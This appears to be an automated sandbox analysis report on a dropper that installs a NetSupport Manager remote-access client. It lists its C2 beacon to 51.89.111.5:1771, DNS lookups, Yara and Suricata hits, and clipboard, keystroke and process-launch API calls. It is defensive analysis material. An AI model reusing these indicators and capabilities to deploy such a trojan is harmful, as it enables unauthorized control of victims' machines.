                                Source: unknownNetwork traffic detected: HTTP traffic on port 49976 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49976 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49976 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49976 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49976 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49976 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49976 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49976 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49976 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49976 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49976 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49976 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49976 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49976 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49976 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49976 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49976 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49976 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49976 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49976 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49976 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49976 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49976 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49976 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49976 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49976 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49976 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49976 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49976 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49976 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49976 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49976 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49977 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49977 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49977 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49977 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49977 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49977 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49977 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49977 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49977 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49977 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49977 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49977 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49977 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49977 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49977 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49977 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49977 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49977 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49977 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49977 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49977 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49977 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49977 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49977 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49977 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49977 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49977 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49977 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49977 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49977 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49977 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49977 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49977 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49977 -> 1771
                                Source: global trafficTCP traffic: 192.168.2.7:49700 -> 51.89.111.5:1771
                                Source: global trafficHTTP traffic detected: GET /location/loca.asp HTTP/1.1Host: geo.netsupportsoftware.comConnection: Keep-AliveCache-Control: no-cache
                                Source: Joe Sandbox ViewIP Address: 104.26.0.231 104.26.0.231
                                Source: Joe Sandbox ViewASN Name: OVHFR OVHFR
                                Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 52.149.20.212:443 -> 192.168.2.7:49728
                                Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 52.149.20.212:443 -> 192.168.2.7:49939
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: global trafficHTTP traffic detected: GET /location/loca.asp HTTP/1.1Host: geo.netsupportsoftware.comConnection: Keep-AliveCache-Control: no-cache
                                Source: global trafficDNS traffic detected: DNS query: pbkvithtosh07.com
                                Source: global trafficDNS traffic detected: DNS query: geo.netsupportsoftware.com
                                Source: unknownHTTP traffic detected: POST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 22Host: 51.89.111.5Connection: Keep-AliveCMD=POLLINFO=1ACK=1Data Raw: Data Ascii:
                                Source: client32.exe, client32.exe, 00000003.00000002.3711137674.000000006E8F0000.00000002.00000001.01000000.0000000C.sdmp, HTCTL32.DLL.0.drString found in binary or memory: http://%s/fakeurl.htm
                                Source: client32.exe, client32.exe, 00000003.00000002.3711137674.000000006E8F0000.00000002.00000001.01000000.0000000C.sdmp, HTCTL32.DLL.0.drString found in binary or memory: http://%s/testpage.htm
                                Source: client32.exe, 00000003.00000002.3711137674.000000006E8F0000.00000002.00000001.01000000.0000000C.sdmp, HTCTL32.DLL.0.drString found in binary or memory: http://%s/testpage.htmwininet.dll
                                Source: client32.exe, client32.exe, 0000000B.00000002.1372082359.0000000011194000.00000002.00000001.01000000.00000008.sdmp, PCICL32.DLL.0.drString found in binary or memory: http://127.0.0.1
                                Source: hkpqXovZtS.exe, 00000000.00000003.1261181102.00000000066FF000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmp, client32.exe, 0000000B.00000002.1372082359.0000000011194000.00000002.00000001.01000000.00000008.sdmp, PCICL32.DLL.0.drString found in binary or memory: http://127.0.0.1RESUMEPRINTING
                                Source: client32.exe, 00000003.00000002.3708134074.0000000002940000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://51.89.111.5/fakeurl.htm
                                Source: client32.exe, 00000003.00000003.1324848844.0000000005AE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geo.netsupportsoftware.com/
                                Source: client32.exe, client32.exe, 0000000B.00000002.1372082359.0000000011194000.00000002.00000001.01000000.00000008.sdmp, PCICL32.DLL.0.drString found in binary or memory: http://geo.netsupportsoftware.com/location/loca.asp
                                Source: hkpqXovZtS.exe, 00000000.00000003.1261181102.00000000066FF000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmp, client32.exe, 0000000B.00000002.1372082359.0000000011194000.00000002.00000001.01000000.00000008.sdmp, PCICL32.DLL.0.drString found in binary or memory: http://geo.netsupportsoftware.com/location/loca.aspSetChannel(%s)
                                Source: client32.exe, 00000003.00000003.1324848844.0000000005AE5000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000003.00000002.3710157110.0000000005AE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geo.netsupportsoftware.com/location/loca.aspj
                                Source: client32.exe, 00000003.00000003.1324775977.0000000005B04000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000003.00000002.3710157110.0000000005B04000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000003.00000003.1569692989.0000000005B04000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geo.netsupportsoftware.com/location/loca.aspl
                                Source: client32.exe, 00000003.00000003.1324848844.0000000005AE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geo.netsupportsoftware.com/location/loca.asps
                                Source: client32.exe, 00000003.00000002.3710157110.0000000005AE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geo.netsupportsoftware.com/location/loca.e
                                Source: hkpqXovZtS.exe, 00000000.00000003.1261181102.0000000006571000.00000004.00000020.00020000.00000000.sdmp, hkpqXovZtS.exe, 00000000.00000003.1261181102.00000000066FF000.00000004.00000020.00020000.00000000.sdmp, client32.exe.0.dr, HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, remcmdstub.exe.0.dr, PCICL32.DLL.0.dr, AudioCapture.dll.0.dr, TCCTL32.DLL.0.dr, PCICHEK.DLL.0.drString found in binary or memory: http://s1.symcb.com/pca3-g5.crl0
                                Source: hkpqXovZtS.exe, 00000000.00000003.1261181102.0000000006571000.00000004.00000020.00020000.00000000.sdmp, hkpqXovZtS.exe, 00000000.00000003.1261181102.00000000066FF000.00000004.00000020.00020000.00000000.sdmp, client32.exe.0.dr, HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, remcmdstub.exe.0.dr, PCICL32.DLL.0.dr, AudioCapture.dll.0.dr, TCCTL32.DLL.0.dr, PCICHEK.DLL.0.drString found in binary or memory: http://s2.symcb.com0
                                Source: client32.exe.0.drString found in binary or memory: http://sv.symcb.com/sv.crl0a
                                Source: hkpqXovZtS.exe, 00000000.00000003.1261181102.0000000006571000.00000004.00000020.00020000.00000000.sdmp, hkpqXovZtS.exe, 00000000.00000003.1261181102.00000000066FF000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, remcmdstub.exe.0.dr, PCICL32.DLL.0.dr, AudioCapture.dll.0.dr, TCCTL32.DLL.0.dr, PCICHEK.DLL.0.drString found in binary or memory: http://sv.symcb.com/sv.crl0f
                                Source: hkpqXovZtS.exe, 00000000.00000003.1261181102.0000000006571000.00000004.00000020.00020000.00000000.sdmp, hkpqXovZtS.exe, 00000000.00000003.1261181102.00000000066FF000.00000004.00000020.00020000.00000000.sdmp, client32.exe.0.dr, HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, remcmdstub.exe.0.dr, PCICL32.DLL.0.dr, AudioCapture.dll.0.dr, TCCTL32.DLL.0.dr, PCICHEK.DLL.0.drString found in binary or memory: http://sv.symcb.com/sv.crt0
                                Source: hkpqXovZtS.exe, 00000000.00000003.1261181102.0000000006571000.00000004.00000020.00020000.00000000.sdmp, hkpqXovZtS.exe, 00000000.00000003.1261181102.00000000066FF000.00000004.00000020.00020000.00000000.sdmp, client32.exe.0.dr, HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, remcmdstub.exe.0.dr, PCICL32.DLL.0.dr, AudioCapture.dll.0.dr, TCCTL32.DLL.0.dr, PCICHEK.DLL.0.drString found in binary or memory: http://sv.symcd.com0&
                                Source: hkpqXovZtS.exe, 00000000.00000003.1261181102.00000000066FF000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmp, client32.exe, 0000000B.00000002.1372118588.00000000111E2000.00000004.00000001.01000000.00000008.sdmp, PCICL32.DLL.0.drString found in binary or memory: http://www.netsupportschool.com/tutor-assistant.asp
                                Source: hkpqXovZtS.exe, 00000000.00000003.1261181102.00000000066FF000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmp, client32.exe, 0000000B.00000002.1372118588.00000000111E2000.00000004.00000001.01000000.00000008.sdmp, PCICL32.DLL.0.drString found in binary or memory: http://www.netsupportschool.com/tutor-assistant.asp11(L
                                Source: hkpqXovZtS.exe, 00000000.00000003.1261181102.00000000066FF000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmp, client32.exe, 0000000B.00000002.1372118588.00000000111E2000.00000004.00000001.01000000.00000008.sdmp, PCICL32.DLL.0.drString found in binary or memory: http://www.pci.co.uk/support
                                Source: hkpqXovZtS.exe, 00000000.00000003.1261181102.00000000066FF000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmp, client32.exe, 0000000B.00000002.1372118588.00000000111E2000.00000004.00000001.01000000.00000008.sdmp, PCICL32.DLL.0.drString found in binary or memory: http://www.pci.co.uk/supportsupport
                                Source: hkpqXovZtS.exe, 00000000.00000003.1261181102.0000000006571000.00000004.00000020.00020000.00000000.sdmp, hkpqXovZtS.exe, 00000000.00000003.1261181102.00000000066FF000.00000004.00000020.00020000.00000000.sdmp, client32.exe.0.dr, HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, remcmdstub.exe.0.dr, PCICL32.DLL.0.dr, AudioCapture.dll.0.dr, TCCTL32.DLL.0.dr, PCICHEK.DLL.0.drString found in binary or memory: http://www.symauth.com/cps0(
                                Source: hkpqXovZtS.exe, 00000000.00000003.1261181102.0000000006571000.00000004.00000020.00020000.00000000.sdmp, hkpqXovZtS.exe, 00000000.00000003.1261181102.00000000066FF000.00000004.00000020.00020000.00000000.sdmp, client32.exe.0.dr, HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, remcmdstub.exe.0.dr, PCICL32.DLL.0.dr, AudioCapture.dll.0.dr, TCCTL32.DLL.0.dr, PCICHEK.DLL.0.drString found in binary or memory: http://www.symauth.com/rpa00
                                Source: hkpqXovZtS.exe, 00000000.00000003.1261181102.0000000006571000.00000004.00000020.00020000.00000000.sdmp, hkpqXovZtS.exe, 00000000.00000003.1261181102.00000000066FF000.00000004.00000020.00020000.00000000.sdmp, client32.exe.0.dr, HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, remcmdstub.exe.0.dr, PCICL32.DLL.0.dr, AudioCapture.dll.0.dr, TCCTL32.DLL.0.dr, PCICHEK.DLL.0.drString found in binary or memory: https://d.symcb.com/cps0%
                                Source: hkpqXovZtS.exe, 00000000.00000003.1261181102.0000000006571000.00000004.00000020.00020000.00000000.sdmp, hkpqXovZtS.exe, 00000000.00000003.1261181102.00000000066FF000.00000004.00000020.00020000.00000000.sdmp, client32.exe.0.dr, HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, remcmdstub.exe.0.dr, PCICL32.DLL.0.dr, AudioCapture.dll.0.dr, TCCTL32.DLL.0.dr, PCICHEK.DLL.0.drString found in binary or memory: https://d.symcb.com/rpa0
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 3_2_1101FC20 OpenClipboard,GlobalAlloc,GlobalLock,_memmove,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,MessageBeep,CloseClipboard,3_2_1101FC20
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 3_2_110335A0 GetClipboardFormatNameA,SetClipboardData,3_2_110335A0
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 3_2_1101FC20 OpenClipboard,GlobalAlloc,GlobalLock,_memmove,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,MessageBeep,CloseClipboard,3_2_1101FC20
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 11_2_110335A0 GetClipboardFormatNameA,SetClipboardData,11_2_110335A0
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 11_2_1101FC20 OpenClipboard,GlobalAlloc,GlobalLock,_memmove,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,MessageBeep,CloseClipboard,11_2_1101FC20
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 3_2_11033320 IsClipboardFormatAvailable,GetClipboardData,GetClipboardFormatNameA,GetLastError,GlobalUnlock,3_2_11033320
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 3_2_110077A0 LoadCursorA,SetCursor,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,CreateDCA,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,SelectClipRgn,BitBlt,SelectClipRgn,DeleteObject,DeleteDC,BitBlt,ReleaseDC,CreatePen,CreateSolidBrush,GetSysColor,LoadBitmapA,_memset,_swscanf,CreateFontIndirectA,_memset,GetStockObject,GetObjectA,CreateFontIndirectA,GetWindowRect,SetWindowTextA,GetSystemMetrics,GetSystemMetrics,SetWindowPos,UpdateWindow,SetCursor,3_2_110077A0
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 3_2_11114590 PeekMessageA,GetKeyState,GetKeyState,GetKeyState,Sleep,GetKeyState,3_2_11114590
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 11_2_11114590 PeekMessageA,GetKeyState,GetKeyState,GetKeyState,Sleep,GetKeyState,11_2_11114590
                                Source: Yara matchFile source: 11.2.client32.exe.111b8c68.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 3.2.client32.exe.111b8c68.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 0.3.hkpqXovZtS.exe.6728888.0.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 3.2.client32.exe.11000000.1.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 11.2.client32.exe.11000000.1.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000B.00000002.1372082359.0000000011194000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000000.00000003.1261181102.00000000066FF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: Process Memory Space: hkpqXovZtS.exe PID: 6968, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: client32.exe PID: 6276, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: client32.exe PID: 7496, type: MEMORYSTR
                                Source: Yara matchFile source: C:\Users\user\AppData\Roaming\SuportUpWin\PCICL32.DLL, type: DROPPED

                                Spam, unwanted Advertisements and Ransom Demands

                                barindex
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 3_2_111165C0 SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,RegCloseKey,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,RegCloseKey,SystemParametersInfoA,3_2_111165C0
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 11_2_111165C0 SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,RegCloseKey,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,RegCloseKey,SystemParametersInfoA,11_2_111165C0
                                Source: C:\Users\user\Desktop\hkpqXovZtS.exeCode function: 0_2_004D0FDC NtAllocateVirtualMemory,NtFreeVirtualMemory,0_2_004D0FDC
                                Source: C:\Users\user\Desktop\hkpqXovZtS.exeCode function: 0_2_004D103C NtFreeVirtualMemory,0_2_004D103C
                                Source: C:\Users\user\Desktop\hkpqXovZtS.exeCode function: 0_2_0044E465 NtQueryInformationProcess,0_2_0044E465
                                Source: C:\Users\user\Desktop\hkpqXovZtS.exeCode function: 0_2_0044E492 NtQueryInformationProcess,0_2_0044E492
                                Source: C:\Users\user\Desktop\hkpqXovZtS.exeCode function: 0_2_004D106C NtQuerySystemInformation,NtQuerySystemInformation,NtOpenThread,NtGetContextThread,NtClose,NtSetContextThread,NtClose,NtClose,0_2_004D106C
                                Source: C:\Users\user\Desktop\hkpqXovZtS.exeCode function: 0_2_004DD291 NtSetInformationThread,0_2_004DD291
                                Source: C:\Users\user\Desktop\hkpqXovZtS.exeCode function: 0_2_0229110B NtCreateFile,0_2_0229110B
                                Source: C:\Users\user\Desktop\hkpqXovZtS.exeCode function: 0_2_022911EE NtReadFile,__allrem,__allrem,NtSetInformationFile,0_2_022911EE
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 3_2_11113190: GetKeyState,DeviceIoControl,keybd_event,3_2_11113190
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 3_2_1115EA00 FindWindowA,_memset,CreateProcessAsUserA,GetLastError,WinExec,CloseHandle,CloseHandle,CloseHandle,WinExec,3_2_1115EA00
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 3_2_1102D9F4 Sleep,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,3_2_1102D9F4
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 3_2_1102DD21 CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,3_2_1102DD21
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 11_2_1102D900 InterlockedIncrement,Sleep,Sleep,GetCurrentProcess,SetPriorityClass,SetEvent,Sleep,PostThreadMessageA,PostThreadMessageA,CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,11_2_1102D900
                                Source: C:\Users\user\Desktop\hkpqXovZtS.exeCode function: 0_2_004173EF0_2_004173EF
                                Source: C:\Users\user\Desktop\hkpqXovZtS.exeCode function: 0_2_0040C10C0_2_0040C10C
                                Source: C:\Users\user\Desktop\hkpqXovZtS.exeCode function: 0_2_0040C35C0_2_0040C35C
                                Source: C:\Users\user\Desktop\hkpqXovZtS.exeCode function: 0_2_0041037B0_2_0041037B
                                Source: C:\Users\user\Desktop\hkpqXovZtS.exeCode function: 0_2_0041A3390_2_0041A339
                                Source: C:\Users\user\Desktop\hkpqXovZtS.exeCode function: 0_2_004163B40_2_004163B4
                                Source: C:\Users\user\Desktop\hkpqXovZtS.exeCode function: 0_2_0040C6150_2_0040C615
                                Source: C:\Users\user\Desktop\hkpqXovZtS.exeCode function: 0_2_0041A70D0_2_0041A70D
                                Source: C:\Users\user\Desktop\hkpqXovZtS.exeCode function: 0_2_0041E7940_2_0041E794
                                Source: C:\Users\user\Desktop\hkpqXovZtS.exeCode function: 0_2_004048A00_2_004048A0
                                Source: C:\Users\user\Desktop\hkpqXovZtS.exeCode function: 0_2_0041AB190_2_0041AB19
                                Source: C:\Users\user\Desktop\hkpqXovZtS.exeCode function: 0_2_00402E660_2_00402E66
                                Source: C:\Users\user\Desktop\hkpqXovZtS.exeCode function: 0_2_0044EEE70_2_0044EEE7
                                Source: C:\Users\user\Desktop\hkpqXovZtS.exeCode function: 0_2_0041AF390_2_0041AF39
                                Source: C:\Users\user\Desktop\hkpqXovZtS.exeCode function: 0_2_004132050_2_00413205
                                Source: C:\Users\user\Desktop\hkpqXovZtS.exeCode function: 0_2_0041552A0_2_0041552A
                                Source: C:\Users\user\Desktop\hkpqXovZtS.exeCode function: 0_2_004055380_2_00405538
                                Source: C:\Users\user\Desktop\hkpqXovZtS.exeCode function: 0_2_004136640_2_00413664
                                Source: C:\Users\user\Desktop\hkpqXovZtS.exeCode function: 0_2_00413BA70_2_00413BA7
                                Source: C:\Users\user\Desktop\hkpqXovZtS.exeCode function: 0_2_00401C560_2_00401C56
                                Source: C:\Users\user\Desktop\hkpqXovZtS.exeCode function: 0_2_00413CC30_2_00413CC3
                                Source: C:\Users\user\Desktop\hkpqXovZtS.exeCode function: 0_2_0040FDFF0_2_0040FDFF
                                Source: C:\Users\user\Desktop\hkpqXovZtS.exeCode function: 0_2_00419E640_2_00419E64
                                Source: C:\Users\user\Desktop\hkpqXovZtS.exeCode function: 0_2_00413FDA0_2_00413FDA
                                Source: C:\Users\user\Desktop\hkpqXovZtS.exeCode function: 0_2_022B20060_2_022B2006
                                Source: C:\Users\user\Desktop\hkpqXovZtS.exeCode function: 0_2_022A41AC0_2_022A41AC
                                Source: C:\Users\user\Desktop\hkpqXovZtS.exeCode function: 0_2_022B068C0_2_022B068C
                                Source: C:\Users\user\Desktop\hkpqXovZtS.exeCode function: 0_2_022A44090_2_022A4409
                                Source: C:\Users\user\Desktop\hkpqXovZtS.exeCode function: 0_2_022B056C0_2_022B056C
                                Source: C:\Users\user\Desktop\hkpqXovZtS.exeCode function: 0_2_022AD2D00_2_022AD2D0
                                Source: C:\Users\user\Desktop\hkpqXovZtS.exeCode function: 0_2_022AD7680_2_022AD768
                                Source: C:\Users\user\Desktop\hkpqXovZtS.exeCode function: 0_2_0229749C0_2_0229749C
                                Source: C:\Users\user\Desktop\hkpqXovZtS.exeCode function: 0_2_0229798C0_2_0229798C
                                Source: C:\Users\user\Desktop\hkpqXovZtS.exeCode function: 0_2_022A3F7A0_2_022A3F7A
                                Source: C:\Users\user\Desktop\hkpqXovZtS.exeCode function: 0_2_022A3D480_2_022A3D48
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 3_2_110736803_2_11073680
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 3_2_11029BB03_2_11029BB0
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 3_2_110627B03_2_110627B0
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 3_2_110336D03_2_110336D0
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 3_2_110518003_2_11051800
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 3_2_1115F8403_2_1115F840
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 3_2_1102BD403_2_1102BD40
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 3_2_1101BCD03_2_1101BCD0
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 3_2_11087F503_2_11087F50
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 3_2_11045E703_2_11045E70
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 3_2_1101C1103_2_1101C110
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 3_2_111640E03_2_111640E0
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 3_2_111683453_2_11168345
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 3_2_111265B03_2_111265B0
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 3_2_110704303_2_11070430
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 3_2_110807403_2_11080740
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 3_2_1100892B3_2_1100892B
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 3_2_1101CF303_2_1101CF30
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 3_2_1116EE8B3_2_1116EE8B
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 3_2_6CEF6E283_2_6CEF6E28
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 3_2_6CEF6E243_2_6CEF6E24
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 3_2_6CF56E183_2_6CF56E18
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 3_2_6CF709153_2_6CF70915
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 3_2_6CF109193_2_6CF10919
